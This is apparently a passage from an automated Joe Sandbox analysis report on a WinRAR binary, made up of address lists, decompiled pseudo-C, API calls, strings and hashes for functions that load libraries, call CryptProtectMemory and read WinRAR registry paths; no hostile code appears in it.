                                                                                                            0x7ff650b53b75
                                                                                                            0x7ff650b53b78
                                                                                                            0x7ff650b53b7d
                                                                                                            0x7ff650b53b7f
                                                                                                            0x7ff650b53b82
                                                                                                            0x7ff650b53b87
                                                                                                            0x7ff650b53b8b
                                                                                                            0x7ff650b53b98
                                                                                                            0x7ff650b53ba3
                                                                                                            0x7ff650b53ba9
                                                                                                            0x7ff650b53bad
                                                                                                            0x7ff650b53bb7
                                                                                                            0x7ff650b53bbf
                                                                                                            0x7ff650b53bc4
                                                                                                            0x7ff650b53bd2
                                                                                                            0x7ff650b53bd6
                                                                                                            0x7ff650b53bdb
                                                                                                            0x7ff650b53be1
                                                                                                            0x7ff650b53bef
                                                                                                            0x7ff650b53bf9
                                                                                                            0x7ff650b53c01
                                                                                                            0x7ff650b53c09
                                                                                                            0x7ff650b53c0e
                                                                                                            0x7ff650b53c13
                                                                                                            0x7ff650b53c1a
                                                                                                            0x7ff650b53c22
                                                                                                            0x7ff650b53c26
                                                                                                            0x7ff650b53c2e
                                                                                                            0x7ff650b53c2e
                                                                                                            0x7ff650b53c35
                                                                                                            0x7ff650b53c3b
                                                                                                            0x7ff650b53c41
                                                                                                            0x7ff650b53c48
                                                                                                            0x7ff650b53c54
                                                                                                            0x7ff650b53c5c
                                                                                                            0x7ff650b53c68
                                                                                                            0x7ff650b53c6e
                                                                                                            0x7ff650b53c7a
                                                                                                            0x7ff650b53c88
                                                                                                            0x7ff650b53c96
                                                                                                            0x7ff650b53ca4
                                                                                                            0x7ff650b53cab
                                                                                                            0x7ff650b53caf
                                                                                                            0x7ff650b53caf
                                                                                                            0x7ff650b53cb6
                                                                                                            0x7ff650b53cbb
                                                                                                            0x7ff650b53cc2
                                                                                                            0x7ff650b53cca
                                                                                                            0x7ff650b53cd7
                                                                                                            0x7ff650b53cde
                                                                                                            0x7ff650b53ce2
                                                                                                            0x7ff650b53ce4
                                                                                                            0x7ff650b53cef
                                                                                                            0x7ff650b53cf3
                                                                                                            0x7ff650b53cf7
                                                                                                            0x7ff650b53cfb
                                                                                                            0x7ff650b53d01
                                                                                                            0x7ff650b53d03
                                                                                                            0x7ff650b53d10
                                                                                                            0x7ff650b53d18
                                                                                                            0x7ff650b53d1c
                                                                                                            0x7ff650b53d1e
                                                                                                            0x7ff650b53d1e
                                                                                                            0x7ff650b53d22
                                                                                                            0x7ff650b53d29
                                                                                                            0x7ff650b53d30
                                                                                                            0x7ff650b53d39
                                                                                                            0x7ff650b53d3f
                                                                                                            0x7ff650b53d44
                                                                                                            0x7ff650b53d4f
                                                                                                            0x7ff650b53d4f
                                                                                                            0x7ff650b53d53
                                                                                                            0x7ff650b53d58
                                                                                                            0x7ff650b53d63
                                                                                                            0x7ff650b53d67
                                                                                                            0x7ff650b53d6f
                                                                                                            0x7ff650b53d74
                                                                                                            0x7ff650b53d79
                                                                                                            0x7ff650b53d7b
                                                                                                            0x7ff650b53d82
                                                                                                            0x7ff650b53d84
                                                                                                            0x7ff650b53d95
                                                                                                            0x7ff650b53d9a
                                                                                                            0x7ff650b53d9e
                                                                                                            0x7ff650b53da9
                                                                                                            0x7ff650b53dab
                                                                                                            0x7ff650b53db9
                                                                                                            0x7ff650b53dbf
                                                                                                            0x7ff650b53dc7
                                                                                                            0x7ff650b53dcd
                                                                                                            0x7ff650b53dd4
                                                                                                            0x7ff650b53ddb
                                                                                                            0x7ff650b53de0
                                                                                                            0x7ff650b53dea
                                                                                                            0x7ff650b53df3
                                                                                                            0x7ff650b53e04
                                                                                                            0x7ff650b53e0b
                                                                                                            0x7ff650b53e21
                                                                                                            0x7ff650b53e25
                                                                                                            0x7ff650b53e31
                                                                                                            0x7ff650b53e38
                                                                                                            0x7ff650b53e3d
                                                                                                            0x7ff650b53e52
                                                                                                            0x7ff650b53e58
                                                                                                            0x7ff650b53e61
                                                                                                            0x7ff650b53e68
                                                                                                            0x7ff650b53e74
                                                                                                            0x7ff650b53e7b
                                                                                                            0x7ff650b53e86
                                                                                                            0x7ff650b53e8c
                                                                                                            0x7ff650b53e8f
                                                                                                            0x7ff650b53e95
                                                                                                            0x7ff650b53e9c
                                                                                                            0x7ff650b53ea3
                                                                                                            0x7ff650b53ea8
                                                                                                            0x7ff650b53eae
                                                                                                            0x7ff650b53eb5
                                                                                                            0x7ff650b53ebc
                                                                                                            0x7ff650b53ec1
                                                                                                            0x7ff650b53ec7
                                                                                                            0x7ff650b53ece
                                                                                                            0x7ff650b53ed5
                                                                                                            0x7ff650b53eda
                                                                                                            0x7ff650b53ee0
                                                                                                            0x7ff650b53ee7
                                                                                                            0x7ff650b53eee
                                                                                                            0x7ff650b53efa
                                                                                                            0x7ff650b53eff
                                                                                                            0x7ff650b53f0c
                                                                                                            0x7ff650b53f13
                                                                                                            0x7ff650b53f1b
                                                                                                            0x7ff650b53f2d
                                                                                                            0x7ff650b53f31
                                                                                                            0x7ff650b53f31
                                                                                                            0x7ff650b53f41
                                                                                                            0x7ff650b53f44
                                                                                                            0x7ff650b53f50
                                                                                                            0x7ff650b53f57
                                                                                                            0x7ff650b53f59
                                                                                                            0x7ff650b53f5c
                                                                                                            0x7ff650b53f5e
                                                                                                            0x7ff650b53f63
                                                                                                            0x7ff650b53f68
                                                                                                            0x7ff650b53f6e
                                                                                                            0x7ff650b53f72
                                                                                                            0x7ff650b53f76
                                                                                                            0x7ff650b53f7e
                                                                                                            0x7ff650b53f83
                                                                                                            0x7ff650b53f89
                                                                                                            0x7ff650b53f8f
                                                                                                            0x7ff650b53f99
                                                                                                            0x7ff650b53fa1
                                                                                                            0x7ff650b53fa7
                                                                                                            0x7ff650b53faf
                                                                                                            0x7ff650b53fb5
                                                                                                            0x7ff650b53fbb
                                                                                                            0x7ff650b53fc1
                                                                                                            0x7ff650b53fc7
                                                                                                            0x7ff650b53fc9
                                                                                                            0x7ff650b53fce
                                                                                                            0x7ff650b53fd0
                                                                                                            0x7ff650b53fd5
                                                                                                            0x7ff650b53fd7
                                                                                                            0x7ff650b53fdc
                                                                                                            0x7ff650b53fde
                                                                                                            0x7ff650b53fe3
                                                                                                            0x7ff650b53fe5
                                                                                                            0x7ff650b53ff4
                                                                                                            0x7ff650b53ffd
                                                                                                            0x7ff650b54003
                                                                                                            0x7ff650b5400b
                                                                                                            0x7ff650b54011
                                                                                                            0x7ff650b54018
                                                                                                            0x7ff650b54023
                                                                                                            0x7ff650b54029
                                                                                                            0x7ff650b54036
                                                                                                            0x7ff650b5403b
                                                                                                            0x7ff650b54045
                                                                                                            0x7ff650b54047
                                                                                                            0x7ff650b5404b
                                                                                                            0x7ff650b54058
                                                                                                            0x7ff650b5405a
                                                                                                            0x7ff650b5405d
                                                                                                            0x7ff650b5405f
                                                                                                            0x7ff650b54066
                                                                                                            0x7ff650b5406a
                                                                                                            0x7ff650b5406c
                                                                                                            0x7ff650b54075
                                                                                                            0x7ff650b5407d
                                                                                                            0x7ff650b5407f
                                                                                                            0x7ff650b54085
                                                                                                            0x7ff650b54087
                                                                                                            0x7ff650b5408d
                                                                                                            0x7ff650b54092
                                                                                                            0x7ff650b54092
                                                                                                            0x7ff650b5409d
                                                                                                            0x7ff650b540a1
                                                                                                            0x7ff650b540a6
                                                                                                            0x7ff650b540ad
                                                                                                            0x7ff650b540b4
                                                                                                            0x7ff650b540b9
                                                                                                            0x7ff650b540c1
                                                                                                            0x7ff650b540d0
                                                                                                            0x7ff650b540d5
                                                                                                            0x7ff650b540d7
                                                                                                            0x7ff650b540dd
                                                                                                            0x7ff650b540e5
                                                                                                            0x7ff650b540eb
                                                                                                            0x7ff650b540f0
                                                                                                            0x7ff650b540f3
                                                                                                            0x7ff650b540f5
                                                                                                            0x7ff650b54103
                                                                                                            0x7ff650b54109
                                                                                                            0x7ff650b5410f
                                                                                                            0x7ff650b54116
                                                                                                            0x7ff650b5411b
                                                                                                            0x7ff650b54124
                                                                                                            0x7ff650b54126
                                                                                                            0x7ff650b5412a
                                                                                                            0x7ff650b5412e
                                                                                                            0x7ff650b54138
                                                                                                            0x7ff650b5413a
                                                                                                            0x7ff650b5413e
                                                                                                            0x7ff650b54140
                                                                                                            0x7ff650b54147
                                                                                                            0x7ff650b5414b
                                                                                                            0x7ff650b54150
                                                                                                            0x7ff650b54156
                                                                                                            0x7ff650b5415e
                                                                                                            0x7ff650b54160
                                                                                                            0x7ff650b54166
                                                                                                            0x7ff650b5416b
                                                                                                            0x7ff650b5416b
                                                                                                            0x7ff650b54176
                                                                                                            0x7ff650b5417a
                                                                                                            0x7ff650b5417f
                                                                                                            0x7ff650b54186
                                                                                                            0x7ff650b5418d
                                                                                                            0x7ff650b54192
                                                                                                            0x7ff650b5419a
                                                                                                            0x7ff650b541a9
                                                                                                            0x7ff650b541b1
                                                                                                            0x7ff650b541b9
                                                                                                            0x7ff650b541be
                                                                                                            0x7ff650b541c6
                                                                                                            0x7ff650b541ce
                                                                                                            0x7ff650b541dd
                                                                                                            0x7ff650b541e9
                                                                                                            0x7ff650b541ef
                                                                                                            0x7ff650b54202
                                                                                                            0x7ff650b5420f
                                                                                                            0x7ff650b5421b
                                                                                                            0x7ff650b5422c
                                                                                                            0x7ff650b54264

                                                                                                            APIs
                                                                                                            • GetModuleFileNameW.KERNEL32(?,?,?,?,?,?,?,00007FF650B538DF,?,00007FF650B480AA), ref: 00007FF650B53957
                                                                                                              • Part of subcall function 00007FF650B5D098: MultiByteToWideChar.KERNEL32(00000000,?,00000001,00000000,?,00007FF650B276BA), ref: 00007FF650B5D0C5
                                                                                                            • snprintf.LEGACY_STDIO_DEFINITIONS ref: 00007FF650B53E38
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000038.00000002.465170993.00007FF650B11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF650B10000, based on PE: true
                                                                                                            • Associated: 00000038.00000002.465151387.00007FF650B10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465535812.00007FF650B80000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465688410.00007FF650B95000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465714314.00007FF650B97000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465733551.00007FF650B9D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465745360.00007FF650BA1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465823673.00007FF650BA9000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465853577.00007FF650BAB000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465923564.00007FF650BB3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465953667.00007FF650BB5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_56_2_7ff650b10000_rar.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ByteCharFileModuleMultiNameWidesnprintf
                                                                                                            • String ID: ,$$%s:$*messages***$*messages***$@%s:$DIALOG$DIRECTION$MENU$RTL$STRINGS
                                                                                                            • API String ID: 596545082-2291855099
                                                                                                            • Opcode ID: cec7e99eebc34baac0afa044510a4efa8b6c3d3c8a8b80eabad0b806df2f51ce
                                                                                                            • Instruction ID: fb6bbe726c700a47c7ca38ac7f9cea01d6a616956e192ba09378bce607717821
                                                                                                            • Opcode Fuzzy Hash: cec7e99eebc34baac0afa044510a4efa8b6c3d3c8a8b80eabad0b806df2f51ce
                                                                                                            • Instruction Fuzzy Hash: 2242AD26A18683A5EB309B24D4946FD2361FF56B88F884231DA4FA77D9FF3AD545C300
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 00007FF650B6A390 Relevance: 21.1, APIs: 8, Strings: 4, Instructions: 61libraryloaderCOMMON
                                                                                                            Download Yara Rule

                                                                                                            Control-flow Graph

                                                                                                            C-Code - Quality: 23%
                                                                                                            			E00007FF67FF650B6A390(long long __rax, struct _CRITICAL_SECTION* __rbx, void* __r9, void* _a8) {

				InitializeCriticalSectionAndSpinCount(__rbx);
				GetModuleHandleW(??); // executed
				if (__rax != 0) goto 0x50b6a3d6;
				GetModuleHandleW(??);
				if (__rax == 0) goto 0x50b6a455;
				GetProcAddress(??, ??);
				GetProcAddress(??, ??);
				if (__rax == 0) goto 0x50b6a413;
				if (__rax == 0) goto 0x50b6a413;
				 *0x50bb3880 = __rax;
				 *0x50bb3888 = __rax;
				goto 0x50b6a431;
				r9d = 0;
				r8d = 0;
				CreateEventW(??, ??, ??, ??);
				 *0x50bb3850 = __rax;
				if (__rax == 0) goto 0x50b6a455;
				if (E00007FF67FF650B6A1C8(0, __rax) == 0) goto 0x50b6a455;
				E00007FF67FF650B6A378(E00007FF67FF650B6A1C8(0, __rax), __rax);
				return 0;
			}



                                                                                                            0x7ff650b6a3a6
                                                                                                            0x7ff650b6a3b3
                                                                                                            0x7ff650b6a3bf
                                                                                                            0x7ff650b6a3c8
                                                                                                            0x7ff650b6a3d4
                                                                                                            0x7ff650b6a3e0
                                                                                                            0x7ff650b6a3f3
                                                                                                            0x7ff650b6a3fc
                                                                                                            0x7ff650b6a401
                                                                                                            0x7ff650b6a403
                                                                                                            0x7ff650b6a40a
                                                                                                            0x7ff650b6a411
                                                                                                            0x7ff650b6a413
                                                                                                            0x7ff650b6a416
                                                                                                            0x7ff650b6a41f
                                                                                                            0x7ff650b6a425
                                                                                                            0x7ff650b6a42f
                                                                                                            0x7ff650b6a43a
                                                                                                            0x7ff650b6a443
                                                                                                            0x7ff650b6a454

                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000038.00000002.465170993.00007FF650B11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF650B10000, based on PE: true
                                                                                                            • Associated: 00000038.00000002.465151387.00007FF650B10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465535812.00007FF650B80000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465688410.00007FF650B95000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465714314.00007FF650B97000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465733551.00007FF650B9D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465745360.00007FF650BA1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465823673.00007FF650BA9000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465853577.00007FF650BAB000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465923564.00007FF650BB3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465953667.00007FF650BB5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_56_2_7ff650b10000_rar.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Handle$AddressCriticalModuleProcSection$CloseCountCreateDeleteEventInitializeSpin
                                                                                                            • String ID: SleepConditionVariableCS$WakeAllConditionVariable$api-ms-win-core-synch-l1-2-0.dll$kernel32.dll
                                                                                                            • API String ID: 2565136772-3242537097
                                                                                                            • Opcode ID: 06a40c3303812acafd3f24a06c97506302b564016980c72a3e5078639b221e33
                                                                                                            • Instruction ID: fdb0fc730674024549475127a6a29141421397bcb68ebea4e18e5ab88d72f9a7
                                                                                                            • Opcode Fuzzy Hash: 06a40c3303812acafd3f24a06c97506302b564016980c72a3e5078639b221e33
                                                                                                            • Instruction Fuzzy Hash: 4E21FC60A19A43B2FE949B60FCD857463A0AF4AB80F6C4535D90FE27B0EF6EF5458700
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 00007FF650B579D8 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 84libraryloaderCOMMON
                                                                                                            Download Yara Rule

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 1315 7ff650b579d8-7ff650b57a0a 1316 7ff650b57a0c-7ff650b57a12 1315->1316 1317 7ff650b57a77 1315->1317 1316->1317 1318 7ff650b57a14-7ff650b57a2a call 7ff650b5ad44 1316->1318 1319 7ff650b57a7e-7ff650b57a8b 1317->1319 1327 7ff650b57a2c-7ff650b57a5e GetProcAddressForCaller GetProcAddress 1318->1327 1328 7ff650b57a60 1318->1328 1321 7ff650b57a8d-7ff650b57a90 1319->1321 1322 7ff650b57ad1-7ff650b57ad4 1319->1322 1325 7ff650b57aee-7ff650b57af7 GetCurrentProcessId 1321->1325 1326 7ff650b57a92-7ff650b57aa2 1321->1326 1324 7ff650b57ad6-7ff650b57ae3 1322->1324 1322->1325 1329 7ff650b57b09-7ff650b57b23 1324->1329 1335 7ff650b57ae5-7ff650b57aec 1324->1335 1325->1329 1330 7ff650b57af9-7ff650b57b07 1325->1330 1326->1329 1334 7ff650b57aa4 1326->1334 1331 7ff650b57a67-7ff650b57a75 1327->1331 1328->1331 1330->1329 1330->1330 1331->1319 1336 7ff650b57aab-7ff650b57acf call 7ff650b2c95c call 7ff650b2cc94 call 7ff650b2c930 1334->1336 1335->1336 1336->1329
                                                                                                            C-Code - Quality: 47%
                                                                                                            			E00007FF67FF650B579D8(void* __ecx, long long __rbx, void* __rcx, void* __rdx, long long __rdi, long long __rsi, long long __rbp, void* __r9, void* _a8, void* _a16, void* _a24, void* _a32) {
				void* _t15;
				long _t20;
				void* _t22;
				void* _t25;
				char _t30;
				long long _t39;
				intOrPtr _t42;
				void* _t64;
				void* _t67;
				long long _t71;
				void* _t74;
				intOrPtr _t77;
				void* _t78;

				_t22 = __ecx;
				_t39 = _t71;
				 *((long long*)(_t39 + 8)) = __rbx;
				 *((long long*)(_t39 + 0x10)) = __rbp;
				 *((long long*)(_t39 + 0x18)) = __rsi;
				 *((long long*)(_t39 + 0x20)) = __rdi;
				r14b = r8b;
				_t64 = __rdx;
				_t67 = __rcx;
				if ( *0x50baf000 != 0) goto 0x50b57a77;
				_t30 =  *0x50baeff8; // 0x1
				if (_t30 != 0) goto 0x50b57a77;
				E00007FF67FF650B5AD44(_t39, L"Crypt32.dll", _t78); // executed
				 *0x50baeff0 = _t39;
				if (_t39 == 0) goto 0x50b57a60;
				GetProcAddress(??, ??);
				 *0x50baf000 = _t39;
				GetProcAddress(??, ??);
				 *0x50baf008 = _t39;
				goto 0x50b57a67;
				_t77 =  *0x50baf000;
				 *0x50baeff8 = 1;
				goto 0x50b57a7e;
				r8d = r9b & 0xffffffff;
				if (r14b == 0) goto 0x50b57ad1;
				if (_t77 == 0) goto 0x50b57aee;
				_t25 = __ecx;
				_t42 = _t77;
				_t15 =  *0x50b80550(); // executed
				if (_t15 != 0) goto 0x50b57b09;
				E00007FF67FF650B2C95C(_t15, 0x50ba7ab8, L"CryptProtectMemory failed", _t74, __r9);
				E00007FF67FF650B2CC94(0, _t22, _t25, _t15, 0x50ba7ab8, _t64, __rcx, __rbp, _t74);
				E00007FF67FF650B2C930(2, _t15, 0x50ba7ab8, 0x50ba7ab8, L"CryptProtectMemory failed", _t74, __r9);
				goto 0x50b57b09;
				if (_t42 == 0) goto 0x50b57aee;
				if ( *0x50b80550() != 0) goto 0x50b57b09;
				goto 0x50b57aab;
				_t20 = GetCurrentProcessId();
				if (_t64 == 0) goto 0x50b57b09;
				_t5 = _t42 + 0x4b; // 0x4b
				 *(0x50ba7ab8 + _t67) =  *(0x50ba7ab8 + _t67) ^ _t5;
				if (0x7ff650ba7ab9 - _t64 < 0) goto 0x50b57af9;
				return _t20;
			}
















                                                                                                            0x7ff650b579d8
                                                                                                            0x7ff650b579d8
                                                                                                            0x7ff650b579db
                                                                                                            0x7ff650b579df
                                                                                                            0x7ff650b579e3
                                                                                                            0x7ff650b579e7
                                                                                                            0x7ff650b579fe
                                                                                                            0x7ff650b57a01
                                                                                                            0x7ff650b57a04
                                                                                                            0x7ff650b57a0a
                                                                                                            0x7ff650b57a0c
                                                                                                            0x7ff650b57a12
                                                                                                            0x7ff650b57a1b
                                                                                                            0x7ff650b57a20
                                                                                                            0x7ff650b57a2a
                                                                                                            0x7ff650b57a36
                                                                                                            0x7ff650b57a4a
                                                                                                            0x7ff650b57a51
                                                                                                            0x7ff650b57a57
                                                                                                            0x7ff650b57a5e
                                                                                                            0x7ff650b57a67
                                                                                                            0x7ff650b57a6e
                                                                                                            0x7ff650b57a75
                                                                                                            0x7ff650b57a81
                                                                                                            0x7ff650b57a8b
                                                                                                            0x7ff650b57a90
                                                                                                            0x7ff650b57a92
                                                                                                            0x7ff650b57a94
                                                                                                            0x7ff650b57a9a
                                                                                                            0x7ff650b57aa2
                                                                                                            0x7ff650b57ab5
                                                                                                            0x7ff650b57abd
                                                                                                            0x7ff650b57aca
                                                                                                            0x7ff650b57acf
                                                                                                            0x7ff650b57ad4
                                                                                                            0x7ff650b57ae3
                                                                                                            0x7ff650b57aec
                                                                                                            0x7ff650b57aee
                                                                                                            0x7ff650b57af7
                                                                                                            0x7ff650b57af9
                                                                                                            0x7ff650b57afe
                                                                                                            0x7ff650b57b07
                                                                                                            0x7ff650b57b23

                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000038.00000002.465170993.00007FF650B11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF650B10000, based on PE: true
                                                                                                            • Associated: 00000038.00000002.465151387.00007FF650B10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465535812.00007FF650B80000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465688410.00007FF650B95000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465714314.00007FF650B97000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465733551.00007FF650B9D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465745360.00007FF650BA1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465823673.00007FF650BA9000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465853577.00007FF650BAB000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465923564.00007FF650BB3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465953667.00007FF650BB5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_56_2_7ff650b10000_rar.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: AddressProc$CallerCurrentDirectoryProcessSystem
                                                                                                            • String ID: Crypt32.dll$CryptProtectMemory$CryptProtectMemory failed$CryptUnprotectMemory$CryptUnprotectMemory failed
                                                                                                            • API String ID: 1389829785-2207617598
                                                                                                            • Opcode ID: c53fb1f2fba6bb9ef90a56791a52fd4b1a48eb95e091f952c54e624aa496fcda
                                                                                                            • Instruction ID: 81925089802878df518a8b555c0813be26a2b06dcee8e4d87d6e916778ed9aef
                                                                                                            • Opcode Fuzzy Hash: c53fb1f2fba6bb9ef90a56791a52fd4b1a48eb95e091f952c54e624aa496fcda
                                                                                                            • Instruction Fuzzy Hash: D3315724B48B43A0FA558B16F9E017927A0AF46B90F1C0175C85FE77A5EE3EE685C300
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 00007FF650B444BC Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 58registryCOMMON
                                                                                                            Download Yara Rule

                                                                                                            Control-flow Graph

                                                                                                            C-Code - Quality: 28%
                                                                                                            			E00007FF67FF650B444BC(char __edi, long long __rbx, long long __rcx, void* __rdx, long long __rbp, char _a8, void* _a16, void* _a24, void* _a32) {
				void* _v40;
				long long _v48;
				long long _v56;
				long _t15;
				void* _t19;
				void* _t22;
				short* _t48;
				int* _t51;
				void* _t55;
				void* _t59;
				void* _t60;

				_t59 = _t55;
				 *((long long*)(_t59 + 0x10)) = __rbx;
				 *((long long*)(_t59 + 0x18)) = __rbp;
				r14d = 0;
				bpl = r8b;
				 *((intOrPtr*)(__rcx)) = r14w;
				 *((long long*)(_t59 - 0x38)) = _t59 - 0x28;
				_t5 = _t60 + 1; // 0x1
				r9d = _t5;
				r8d = 0;
				_t15 = RegOpenKeyExW(??, ??, ??, ??, ??); // executed
				if (_t15 != 0) goto 0x50b4453e;
				_v48 =  &_a8;
				r8d = 0;
				_v56 = __rcx;
				_a8 = __edi;
				RegQueryValueExW(_t60, _t48, _t51);
				RegCloseKey(??);
				if ( *((intOrPtr*)(__rcx)) == r14w) goto 0x50b44552;
				if (E00007FF67FF650B3345C() != 0) goto 0x50b4457a;
				r8b = bpl;
				_t19 = E00007FF67FF650B441D0(_t22,  &_a8, __rcx, __rcx, __rdx, __rbp); // executed
				if (_t19 != 0) goto 0x50b4457a;
				r8d = __edi;
				GetModuleFileNameW(??, ??, ??);
				return E00007FF67FF650B45170(0,  &_a8, __rcx);
			}














                                                                                                            0x7ff650b444bc
                                                                                                            0x7ff650b444bf
                                                                                                            0x7ff650b444c3
                                                                                                            0x7ff650b444cf
                                                                                                            0x7ff650b444d6
                                                                                                            0x7ff650b444d9
                                                                                                            0x7ff650b444e0
                                                                                                            0x7ff650b444ee
                                                                                                            0x7ff650b444ee
                                                                                                            0x7ff650b444f2
                                                                                                            0x7ff650b444fc
                                                                                                            0x7ff650b44504
                                                                                                            0x7ff650b44510
                                                                                                            0x7ff650b4451a
                                                                                                            0x7ff650b4451d
                                                                                                            0x7ff650b44529
                                                                                                            0x7ff650b4452d
                                                                                                            0x7ff650b44538
                                                                                                            0x7ff650b44544
                                                                                                            0x7ff650b44550
                                                                                                            0x7ff650b44552
                                                                                                            0x7ff650b4455b
                                                                                                            0x7ff650b44562
                                                                                                            0x7ff650b44564
                                                                                                            0x7ff650b4456c
                                                                                                            0x7ff650b4458c

                                                                                                            APIs
                                                                                                            • RegOpenKeyExW.KERNELBASE(?,?,?,?,The system cannot find the file specified.,00000800,00000000,00007FF650B43977,?,?,?,00007FF650B44310), ref: 00007FF650B444FC
                                                                                                            • RegQueryValueExW.ADVAPI32(?,?,?,?,The system cannot find the file specified.,00000800,00000000,00007FF650B43977,?,?,?,00007FF650B44310), ref: 00007FF650B4452D
                                                                                                            • RegCloseKey.ADVAPI32(?,?,?,?,The system cannot find the file specified.,00000800,00000000,00007FF650B43977,?,?,?,00007FF650B44310), ref: 00007FF650B44538
                                                                                                            • GetModuleFileNameW.KERNEL32(?,?,?,?,The system cannot find the file specified.,00000800,00000000,00007FF650B43977,?,?,?,00007FF650B44310), ref: 00007FF650B4456C
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000038.00000002.465170993.00007FF650B11000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF650B10000, based on PE: true
                                                                                                            • Associated: 00000038.00000002.465151387.00007FF650B10000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465535812.00007FF650B80000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465688410.00007FF650B95000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465714314.00007FF650B97000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465733551.00007FF650B9D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465745360.00007FF650BA1000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465823673.00007FF650BA9000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465853577.00007FF650BAB000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465923564.00007FF650BB3000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                            • Associated: 00000038.00000002.465953667.00007FF650BB5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_56_2_7ff650b10000_rar.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CloseFileModuleNameOpenQueryValue
                                                                                                            • String ID: The system cannot find the file specified.$AppData$Software\WinRAR\Paths
                                                                                                            • API String ID: 3617018055-2119934629
                                                                                                            • Opcode ID: 28a2dbbd832a95648651d233666d04b29aca40257cecb39b45861ce44588f790
                                                                                                            • Instruction ID: 0d8c6d627f7a3ae1c9a7d288cbf7c2927661080d4e35207a8d76ced5e77e1ab8
                                                                                                            • Opcode Fuzzy Hash: 28a2dbbd832a95648651d233666d04b29aca40257cecb39b45861ce44588f790
                                                                                                            • Instruction Fuzzy Hash: 3321B332A18B03A2EB519F21B4805A97761FF49BD0F084131EE9EA3765EF3ED5458700
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 00007FF650B6CECC Relevance: 10.8, APIs: 3, Strings: 3, Instructions: 317COMMONLIBRARYCODE
